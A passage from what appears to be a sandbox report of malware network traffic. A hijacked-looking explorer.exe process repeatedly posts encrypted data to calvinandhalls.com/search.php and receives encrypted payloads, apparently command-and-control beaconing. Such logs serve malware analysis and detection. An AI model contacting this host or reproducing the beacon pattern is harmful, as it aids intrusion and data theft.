                                                                                          2024-10-03 21:28:33 UTC278INHTTP/1.1 200 OK
                                                                                          Date: Thu, 03 Oct 2024 21:28:33 GMT
                                                                                          Server: Apache/2.4.52 (Ubuntu)
                                                                                          X-Frame-Options: DENY
                                                                                          X-Content-Type-Options: nosniff
                                                                                          X-Frame-Options: DENY
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Content-Length: 0
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Connection: close


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          8192.168.2.55001123.145.40.1624431028C:\Windows\explorer.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-10-03 21:28:34 UTC288OUTPOST /search.php HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: https://kheehglmstrxeo.org/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 213
                                                                                          Host: calvinandhalls.com
                                                                                          2024-10-03 21:28:34 UTC213OUTData Raw: 72 19 89 cb f7 79 67 fe 61 8b 9d 1c 38 85 61 2d de 87 b3 db 62 0f 44 f7 02 06 b1 9b ed a7 44 ea 0b 99 b9 f7 75 f9 df 84 f3 79 d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6c 34 01 83 b7 25 93 3c 6d bd 18 b6 94 cb 35 59 ad 23 7d 95 43 d2 c9 3b 62 a7 30 51 70 c1 d8 dc 7e aa a6 5a 71 fe bb 46 97 64 35 bb 9c 5a 7c 4b 6b 0d 56 f0 34 c3 e0 b2 5e d2 f5 70 14 5b 9b 0b 20 a0 35 65 95 e9 e0 b7 2e 06 bc 02 d8 4c bc 71 28 9c 50 ac 4f 34 57 2f 09 ee a2 0c e4 b2 6f c1 29 19 f5 fa 91 0a f0 82 46 86 ba ee bd 47 39 d7 85 af 50 2d 91 18 45 8e 07 66 00 bf 46 2e 7b ca 45 29 0e 84 ba d2 04 2f c6 e2 61 94 4a 99 90
                                                                                          Data Ascii: ryga8a-bDDuy(#%P g3iqH[@Ll4%<m5Y#}C;b0Qp~ZqFd5Z|KkV4^p[ 5e.Lq(PO4W/o)FG9P-EfF.{E)/aJ
                                                                                          2024-10-03 21:28:34 UTC278INHTTP/1.1 200 OK
                                                                                          Date: Thu, 03 Oct 2024 21:28:34 GMT
                                                                                          Server: Apache/2.4.52 (Ubuntu)
                                                                                          X-Frame-Options: DENY
                                                                                          X-Content-Type-Options: nosniff
                                                                                          X-Frame-Options: DENY
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Content-Length: 0
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Connection: close


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          9192.168.2.55001223.145.40.1624431028C:\Windows\explorer.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-10-03 21:28:35 UTC288OUTPOST /search.php HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: https://jhcyskiuwnguyo.org/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 296
                                                                                          Host: calvinandhalls.com
                                                                                          2024-10-03 21:28:35 UTC296OUTData Raw: 72 19 89 cb f7 79 67 fe 61 8b 9d 1c 38 85 61 2d de 87 b3 db 62 0f 44 f7 02 06 b1 9b ed a7 44 ea 0b 99 b9 f7 75 f9 df 84 f3 79 d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6d 34 01 83 b7 25 93 3c 2d af 1f 80 da ad 57 30 ab 23 38 b0 66 9f e1 36 0f b0 6f 58 3a a1 c6 99 66 f1 b5 77 47 88 8d 76 ba 4e 5c e6 ea 64 74 7c 46 53 06 9c 05 9a c4 df 57 84 ef 3d 28 2b ab 7e 56 e1 56 6f ca d5 82 99 26 6c 93 7d da 36 bb 2f 37 83 3f 8c 3a 6a 62 01 50 ee cc 65 a3 be 16 f1 46 3f f1 d2 db 09 c6 a4 45 a0 d5 a9 d8 3a 7b c6 96 91 6e 3b ce 76 0f d6 17 6a 15 f5 75 73 7b f1 51 7c 0e f4 a2 9d 06 6c d4 e4 22 ad 7c ec d6 de 29 38 28 78 a2 08 2a 1d 4b 75 ec 2d fc 99 2c 3a 70 4b 18 9c a1 34 44 31 5c b2 82 e4 18 f6 dc 21 f5 46 84 8e e7 cd 5a db 7b
                                                                                          Data Ascii: ryga8a-bDDuy(#%P g3iqH[@Lm4%<-W0#8f6oX:fwGvN\dt|FSW=(+~VVo&l}6/7?:jbPeF?E:{n;vjus{Q|l"|)8(x*Ku-,:pK4D1\!FZ{
                                                                                          2024-10-03 21:28:35 UTC278INHTTP/1.1 200 OK
                                                                                          Date: Thu, 03 Oct 2024 21:28:35 GMT
                                                                                          Server: Apache/2.4.52 (Ubuntu)
                                                                                          X-Frame-Options: DENY
                                                                                          X-Content-Type-Options: nosniff
                                                                                          X-Frame-Options: DENY
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Content-Length: 0
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Connection: close


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          10192.168.2.55001323.145.40.1624431028C:\Windows\explorer.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-10-03 21:28:36 UTC285OUTPOST /search.php HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: https://frkpgrboqqf.com/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 155
                                                                                          Host: calvinandhalls.com
                                                                                          2024-10-03 21:28:36 UTC155OUTData Raw: 72 19 89 cb f7 79 67 fe 61 8b 9d 1c 38 85 61 2d de 87 b3 db 62 0f 44 f7 02 06 b1 9b ed a7 44 ea 0b 99 b9 f7 75 f9 df 84 f3 79 d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 62 34 01 83 b7 25 93 3c 46 ac 0f fe 87 e4 05 2f b9 2c 7c b5 7b fb d8 3f 11 ba 1d 28 2f c2 ee 93 34 c7 b9 07 17 8b f1 7c ba 3b 5e 95 ee 50 1c 4b 60 20 2f 8e 0b 80 f2 91 26 e1 fb 76 0e 56 bf 51 5f a2 71 50 88 c7 b3 d7 43 31 c0 04 bd 49 8f 7a 2b b1 32 a6 02
                                                                                          Data Ascii: ryga8a-bDDuy(#%P g3iqH[@Lb4%<F/,|{?(/4|;^PK` /&vVQ_qPC1Iz+2
                                                                                          2024-10-03 21:28:36 UTC278INHTTP/1.1 200 OK
                                                                                          Date: Thu, 03 Oct 2024 21:28:36 GMT
                                                                                          Server: Apache/2.4.52 (Ubuntu)
                                                                                          X-Frame-Options: DENY
                                                                                          X-Content-Type-Options: nosniff
                                                                                          X-Frame-Options: DENY
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Content-Length: 0
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Connection: close


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          11192.168.2.55001423.145.40.1624431028C:\Windows\explorer.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-10-03 21:28:37 UTC288OUTPOST /search.php HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: https://atbscwbcvtybbp.org/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 292
                                                                                          Host: calvinandhalls.com
                                                                                          2024-10-03 21:28:37 UTC292OUTData Raw: 72 19 89 cb f7 79 67 fe 61 8b 9d 1c 38 85 61 2d de 87 b3 db 62 0f 44 f7 02 06 b1 9b ed a7 44 ea 0b 99 b9 f7 75 f9 df 84 f3 79 d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 63 34 01 83 b7 25 93 3c 54 fc 06 ba a1 c4 11 4d f4 0b 63 a3 2b c1 f3 10 0c fc 0f 2b 20 da af 8d 36 cc d9 09 0d cf f3 5b 8a 2d 72 b2 90 15 6d 69 4f 2f 40 8e 0f 9d 8a b7 0f 98 e6 48 26 27 b2 7c 21 e4 70 60 d6 cd e1 98 5e 11 99 16 fe 6b fd 60 56 b9 06 ba 5c 4a 56 37 50 de cd 6d ad c4 73 85 56 69 ea c0 d5 3a c9 b1 76 9c 89 af dd 2e 36 cc d4 d2 49 57 d6 51 5b 98 2d 77 40 96 34 37 79 c3 5e 64 11 dc bd 8d 67 23 d5 e4 30 f4 23 f9 cc b8 11 32 63 20 df 05 7e 73 0b 06 e5 43 82 bb 36 23 28 73 4b 84 83 3c 7d 1c 37 c7 c8 e5 5c f8 c9 68 f2 76 d9 bb e4 d4 4a c0 29
                                                                                          Data Ascii: ryga8a-bDDuy(#%P g3iqH[@Lc4%<TMc++ 6[-rmiO/@H&'|!p`^k`V\JV7PmsVi:v.6IWQ[-w@47y^dg#0#2c ~sC6#(sK<}7\hvJ)
                                                                                          2024-10-03 21:28:37 UTC278INHTTP/1.1 200 OK
                                                                                          Date: Thu, 03 Oct 2024 21:28:37 GMT
                                                                                          Server: Apache/2.4.52 (Ubuntu)
                                                                                          X-Frame-Options: DENY
                                                                                          X-Content-Type-Options: nosniff
                                                                                          X-Frame-Options: DENY
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Content-Length: 0
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Connection: close


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          12192.168.2.55001523.145.40.1624431028C:\Windows\explorer.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-10-03 21:28:38 UTC287OUTPOST /search.php HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: https://odhashqreyopr.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 151
                                                                                          Host: calvinandhalls.com
                                                                                          2024-10-03 21:28:38 UTC151OUTData Raw: 72 19 89 cb f7 79 67 fe 61 8b 9d 1c 38 85 61 2d de 87 b3 db 62 0f 44 f7 02 06 b1 9b ed a7 44 ea 0b 99 b9 f7 75 f9 df 84 f3 79 d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 60 34 01 83 b7 25 93 3c 50 bf 19 bd ca be 3d 16 eb 07 2d e0 56 9a f5 33 16 e0 0a 36 32 d3 cf fa 27 a0 c5 0f 12 ff 8b 69 b7 3d 73 8d 8b 73 00 2f 70 44 30 8c 3a a8 c8 a7 4d f1 fa 6f 07 30 93 0c 5f c6 29 60 cb f8 8c 80 13 09 c7 0f b9 22 e2 1f 13
                                                                                          Data Ascii: ryga8a-bDDuy(#%P g3iqH[@L`4%<P=-V362'i=ss/pD0:Mo0_)`"
                                                                                          2024-10-03 21:28:38 UTC278INHTTP/1.1 200 OK
                                                                                          Date: Thu, 03 Oct 2024 21:28:38 GMT
                                                                                          Server: Apache/2.4.52 (Ubuntu)
                                                                                          X-Frame-Options: DENY
                                                                                          X-Content-Type-Options: nosniff
                                                                                          X-Frame-Options: DENY
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Content-Length: 0
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Connection: close


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          13192.168.2.55001623.145.40.1624431028C:\Windows\explorer.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-10-03 21:28:39 UTC287OUTPOST /search.php HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: https://tbgynejneafdk.com/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 299
                                                                                          Host: calvinandhalls.com
                                                                                          2024-10-03 21:28:39 UTC299OUTData Raw: 72 19 89 cb f7 79 67 fe 61 8b 9d 1c 38 85 61 2d de 87 b3 db 62 0f 44 f7 02 06 b1 9b ed a7 44 ea 0b 99 b9 f7 75 f9 df 84 f3 79 d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 61 34 01 83 b7 25 93 3c 2a ed 76 e3 c6 fb 0c 4d f3 23 37 f2 47 c1 85 73 0b ca 10 38 62 dd be c7 31 c7 b1 62 11 c6 ef 25 e5 38 53 9b dd 5f 30 60 75 4c 5f 9b 1d d1 fd df 34 9d e2 63 16 0c a7 0d 3f b4 34 43 83 d9 82 d8 5d 2f 89 46 aa 52 fc 1f 37 82 02 bf 6a 45 3e 69 17 c6 cd 0f ec c9 18 e3 3f 25 c8 e3 97 5d f3 e5 77 a1 cb ec 83 3e 34 88 83 db 7b 47 aa 07 13 de 25 03 20 a7 60 21 6f fa 58 39 38 e7 c9 e8 3a 78 96 ea 06 fa 50 f1 df cb 18 32 27 76 cc 6c 6a 06 24 03 b5 35 8d 81 0c 27 12 66 39 87 82 6d 24 49 33 a5 c2 c4 33 c5 c7 78 df 5e bc ab fc 85 60 99 40
                                                                                          Data Ascii: ryga8a-bDDuy(#%P g3iqH[@La4%<*vM#7Gs8b1b%8S_0`uL_4c?4C]/FR7jE>i?%]w>4{G% `!oX98:xP2'vlj$5'f9m$I33x^`@
                                                                                          2024-10-03 21:28:39 UTC278INHTTP/1.1 200 OK
                                                                                          Date: Thu, 03 Oct 2024 21:28:39 GMT
                                                                                          Server: Apache/2.4.52 (Ubuntu)
                                                                                          X-Frame-Options: DENY
                                                                                          X-Content-Type-Options: nosniff
                                                                                          X-Frame-Options: DENY
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Content-Length: 0
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Connection: close


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          14192.168.2.55001723.145.40.1624431028C:\Windows\explorer.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-10-03 21:28:40 UTC288OUTPOST /search.php HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: https://mqhahmibwlnntq.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 283
                                                                                          Host: calvinandhalls.com
                                                                                          2024-10-03 21:28:40 UTC283OUTData Raw: 72 19 89 cb f7 79 67 fe 61 8b 9d 1c 38 85 61 2d de 87 b3 db 62 0f 44 f7 02 06 b1 9b ed a7 44 ea 0b 99 b9 f7 75 f9 df 84 f3 79 d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 66 34 01 83 b7 25 93 3c 71 f8 35 95 c6 e5 20 5c a3 70 61 84 72 d6 ca 16 2d b1 39 07 6c c4 c6 83 7f fe a0 05 42 9a 8a 53 f6 4a 5c bc 94 1c 7a 41 5a 05 24 e2 3b b6 91 c5 22 f8 87 57 1f 35 af 0e 19 cd 69 10 8d fa a1 b9 13 7e a2 0e e2 2b b6 01 3c a4 1d 8b 55 50 36 13 14 b8 de 40 9e a8 6d 89 28 01 c4 a7 91 3b ab 81 4e be be 8a 9d 1a 5f a0 b8 ac 0b 5c d1 75 12 f0 2c 04 46 a5 4a 7e 2a e7 2d 2d 28 e5 c0 9a 67 4c ae ac 64 f7 38 e7 a0 d5 27 29 1f 34 f3 4f 12 02 0e 23 f4 1c e1 ce 14 23 6e 5e 03 d5 88 44 66 1c 33 dd 80 cf 47 c8 f4 11 c1 54 be a0 ae c6 05 b9 43
                                                                                          Data Ascii: ryga8a-bDDuy(#%P g3iqH[@Lf4%<q5 \par-9lBSJ\zAZ$;"W5i~+<UP6@m(;N_\u,FJ~*--(gLd8')4O##n^Df3GTC
                                                                                          2024-10-03 21:28:40 UTC294INHTTP/1.1 404 Not Found
                                                                                          Date: Thu, 03 Oct 2024 21:28:40 GMT
                                                                                          Server: Apache/2.4.52 (Ubuntu)
                                                                                          X-Frame-Options: DENY
                                                                                          X-Content-Type-Options: nosniff
                                                                                          X-Frame-Options: DENY
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Connection: close
                                                                                          Transfer-Encoding: chunked
                                                                                          2024-10-03 21:28:40 UTC7898INData Raw: 31 65 65 37 0d 0a 00 00 b5 50 0f 6d f7 61 d7 e7 49 78 ba 09 bf db 6e 5b 92 64 4f 0c f1 aa 5d 78 6e 1d 37 6e a3 bf 51 b7 61 50 c8 4c 75 ec 96 6c 61 47 6f 72 d9 5d 28 4a c9 17 cf ae b0 92 75 82 7c d6 cc 92 b4 cc 04 6e 80 d9 27 08 88 90 7c 25 38 3b 06 b0 d9 98 1f b3 ee 24 b2 8e 94 c4 c7 84 78 7f df ff 07 32 07 d4 23 b4 c2 cf a3 d9 18 29 4c b6 6d 7e 16 31 ba 88 9c 6f 27 9e 77 77 ec 42 27 39 f1 c8 b5 0f 2b 2c 37 f5 27 0c ee 96 8c 2c eb 7f 13 2a 58 0b a1 c6 4a a5 04 a5 ee 06 88 e3 1d 96 d0 4c d7 1a 1c 0b 6e 31 a2 fd 08 4f 89 d7 29 16 31 bd a7 21 aa 5c b5 b5 55 45 44 dc a1 75 85 c1 e8 06 3a f3 80 41 02 4f fe 76 f4 a8 10 4e 8c 77 26 ec 91 05 1d da 3e 11 60 70 e2 86 3d ef 6e dd fe db a9 55 d9 c9 88 8a 82 ba 08 34 ee fb c7 34 41 b5 cd 3a 1d 0c d7 46 85 07 8f 3d 07
                                                                                          Data Ascii: 1ee7PmaIxn[dO]xn7nQaPLulaGor](Ju|n'|%8;$x2#)Lm~1o'wwB'9+,7',*XJLn1O)1!\UEDu:AOvNw&>`p=nU44A:F=
                                                                                          2024-10-03 21:28:40 UTC19INData Raw: 1a 58 b2 14 d1 ff ef 1b ab d4 44 9e af 19 24 1b 3c de a6
                                                                                          Data Ascii: XD$<
                                                                                          2024-10-03 21:28:40 UTC2INData Raw: 0d 0a
                                                                                          Data Ascii:
                                                                                          2024-10-03 21:28:40 UTC8192INData Raw: 32 30 30 30 0d 0a 4f b0 ac 7b 5b 94 2f 8e fb a5 49 75 0f 40 51 70 86 33 86 ea 54 c2 9c a9 b3 9c cf 10 ce 73 f3 0a 45 73 70 80 bd cf 7c c6 1c 25 20 f0 db 31 01 72 f0 5d 54 16 83 19 c9 78 43 66 d9 c7 7f 47 ca 0f f7 a2 70 1e 62 4f 97 d4 85 58 23 aa d0 91 09 29 ee 80 ff 8b 54 15 25 28 bd e0 44 37 f5 d2 98 eb 0f e0 d6 36 42 df 9d 30 3b 76 0a 49 8d d8 2a 5a 2c 48 85 64 39 6f df 29 ee ea 49 62 42 61 fc 57 6e 83 9a b6 22 77 a6 6b e0 cf c9 e4 7a 54 6a 49 6b 6f 35 b7 56 48 95 56 16 b2 96 49 9e ba 4c 2c 9b 9c 43 42 13 5b a3 ab 34 c0 82 5d a9 9e 70 45 78 63 d2 8a a7 06 b3 53 cc e2 23 f1 5f eb 82 a9 0c ba 27 c8 99 eb 5e 0c 15 68 6c d4 ae e1 12 2f 24 0c 48 6d a6 03 50 bc 8c c8 19 7b 50 c9 e8 5e 04 70 28 b9 77 49 81 50 c8 50 6b ae b4 0b 13 a5 ca 64 4c e6 f3 cd d4 f6 e4
                                                                                          Data Ascii: 2000O{[/Iu@Qp3TsEsp|% 1r]TxCfGpbOX#)T%(D76B0;vI*Z,Hd9o)IbBaWn"wkzTjIko5VHVIL,CB[4]pExcS#_'^hl/$HmP{P^p(wIPPkdL
                                                                                          2024-10-03 21:28:40 UTC6INData Raw: 4e 13 8c ae b0 c6
                                                                                          Data Ascii: N
                                                                                          2024-10-03 21:28:40 UTC2INData Raw: 0d 0a
                                                                                          Data Ascii:
                                                                                          2024-10-03 21:28:40 UTC8192INData Raw: 32 30 30 30 0d 0a 37 b1 80 d9 81 f6 4a 57 1f 8f 04 5f c4 c1 88 46 ee 18 f5 d8 fe a1 a3 c6 ae 36 1a 9c e0 fa 7a 50 95 22 b4 51 4c 25 b1 f4 18 0d 15 d0 06 0a 15 7b 22 d8 b8 63 41 09 53 8a 61 25 04 92 dd b9 c8 34 da 29 b1 d3 b5 7c 9b b7 ff 21 7f 68 a2 a1 99 ca f2 df ce 53 bb f5 67 4b 05 db de 01 f7 41 65 c4 8c 62 3c 94 b8 4a 79 8f 0f fc ed 98 91 1c 6c 74 27 cb 44 8c b3 ad 55 8f 66 a4 df a5 4c f4 c9 c1 69 5d 48 0b 4f 32 71 7a 52 6c c0 39 48 fa 96 d0 c8 ec f4 9c a0 0a 28 2c 0e 70 0f 5f 56 3f 57 12 a8 f7 ec d3 73 0d 42 60 a6 37 ca 65 e1 1c 43 c8 32 77 4f a8 25 84 73 8c 57 fe fd 9b 22 07 c9 76 66 b6 ee 85 11 52 c9 be 4e b1 d6 66 9c d8 30 3f 8d 93 5a f4 d5 f2 5f 31 3d a5 2f 45 84 49 21 aa 61 87 37 f6 f5 9a 70 4c 4c f9 1d fb e1 fe d1 ef cb f9 05 71 1e 89 dd 8a 35
                                                                                          Data Ascii: 20007JW_F6zP"QL%{"cASa%4)|!hSgKAeb<Jylt'DUfLi]HO2qzRl9H(,p_V?WsB`7eC2wO%sW"vfRNf0?Z_1=/EI!a7pLLq5
                                                                                          2024-10-03 21:28:40 UTC6INData Raw: eb 47 a6 2d 95 51
                                                                                          Data Ascii: G-Q
                                                                                          2024-10-03 21:28:40 UTC2INData Raw: 0d 0a
                                                                                          Data Ascii:


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          15192.168.2.55001823.145.40.1624431028C:\Windows\explorer.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-10-03 21:28:41 UTC286OUTPOST /search.php HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: https://xdrrfipvxfhn.com/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 340
                                                                                          Host: calvinandhalls.com
                                                                                          2024-10-03 21:28:41 UTC340OUTData Raw: 72 19 89 cb f7 79 67 fe 61 8b 9d 1c 38 85 61 2d de 87 b3 db 62 0f 44 f7 02 06 b1 9b ed a7 44 ea 0b 99 b9 f7 75 f9 df 84 f3 79 d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 41 4c 66 34 01 83 b6 25 93 3c 5d ce 18 83 97 cd 49 46 e6 14 20 f8 54 fb 9e 76 2d b5 77 0e 26 b2 e0 ea 5e fb ac 6a 00 f5 86 6d b2 70 3d a3 dd 09 76 28 6f 54 3c e8 35 9e cd 90 35 e1 9c 4f 10 52 94 04 3d d6 39 7a 8b 87 b2 c3 4e 08 95 5f b1 71 ab 1a 43 bd 3f b7 5c 78 7d 0d 70 ab f9 17 8a 9b 6f 9e 09 25 f6 be 82 47 dc bf 62 99 9c ea c3 3c 46 cd af aa 64 41 cf 62 47 94 6a 42 4b b5 6f 77 63 eb 02 31 36 f9 b4 ef 3a 70 89 b4 0b a8 64 e8 a5 f6 69 6c 20 76 e0 11 27 73 06 31 c7 3d ff ac 25 2e 7c 28 27 ef a4 4c 77 02 39 88 c5 97 4b 96 d6 30 d3 60 81 96 f2 9f 4a cb 68
                                                                                          Data Ascii: ryga8a-bDDuy(#%P g3iqH[ALf4%<]IF Tv-w&^jmp=v(oT<55OR=9zN_qC?\x}po%Gb<FdAbGjBKowc16:pdil v's1=%.|('Lw9K0`Jh
                                                                                          2024-10-03 21:28:41 UTC287INHTTP/1.1 404 Not Found
                                                                                          Date: Thu, 03 Oct 2024 21:28:41 GMT
                                                                                          Server: Apache/2.4.52 (Ubuntu)
                                                                                          X-Frame-Options: DENY
                                                                                          X-Content-Type-Options: nosniff
                                                                                          X-Frame-Options: DENY
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Content-Length: 409
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Connection: close
                                                                                          2024-10-03 21:28:41 UTC409INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered wh


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          16192.168.2.55001923.145.40.1624431028C:\Windows\explorer.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-10-03 21:28:42 UTC287OUTPOST /search.php HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: https://vgsfrcxsvaoca.com/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 327
                                                                                          Host: calvinandhalls.com
                                                                                          2024-10-03 21:28:42 UTC327OUTData Raw: 72 19 89 cb f7 79 67 fe 61 8b 9d 1c 38 85 61 2d de 87 b3 db 62 0f 44 f7 02 06 b1 9b ed a7 44 ea 0b 99 b9 f7 75 f9 df 84 f3 79 d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 67 34 01 83 b7 25 93 3c 30 cc 65 fd b2 e9 3e 15 f1 64 10 85 55 9a e1 3f 08 c7 11 3b 2a a7 a2 87 25 ed fe 44 78 de 86 7b f4 58 25 bb e7 5f 71 79 44 02 25 e9 0b cc da d4 01 cb e4 57 31 3e 8d 5e 17 c4 6e 42 c3 8a a8 a2 07 1d c0 14 bc 7d f7 06 70 9f 1b d6 4f 47 67 11 58 b6 c3 4c be d3 3a 88 4e 1c 91 d2 94 03 b2 e5 71 f5 97 bf c2 4a 39 c3 da 9e 75 1a 92 63 44 89 29 6d 2f 9f 7e 26 6f d0 3f 09 59 9b d6 de 6f 41 ae ba 33 a7 33 e7 d7 c7 62 60 78 54 c7 69 7c 65 38 76 b9 2f f0 c6 2b 40 21 7c 05 82 a5 53 21 38 4d 90 eb ee 46 e3 db 63 d8 41 87 ea ea b4 0f ba 71
                                                                                          Data Ascii: ryga8a-bDDuy(#%P g3iqH[@Lg4%<0e>dU?;*%Dx{X%_qyD%W1>^nB}pOGgXL:NqJ9ucD)m/~&o?YoA33b`xTi|e8v/+@!|S!8MFcAq
                                                                                          2024-10-03 21:28:42 UTC278INHTTP/1.1 200 OK
                                                                                          Date: Thu, 03 Oct 2024 21:28:42 GMT
                                                                                          Server: Apache/2.4.52 (Ubuntu)
                                                                                          X-Frame-Options: DENY
                                                                                          X-Content-Type-Options: nosniff
                                                                                          X-Frame-Options: DENY
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Content-Length: 0
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Connection: close


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          17192.168.2.55002023.145.40.1624431028C:\Windows\explorer.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-10-03 21:28:43 UTC285OUTPOST /search.php HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: https://msqyarjhmbx.com/
